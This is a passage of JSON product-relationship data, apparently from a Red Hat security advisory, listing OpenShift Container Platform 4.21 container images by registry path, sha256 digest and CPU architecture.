"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
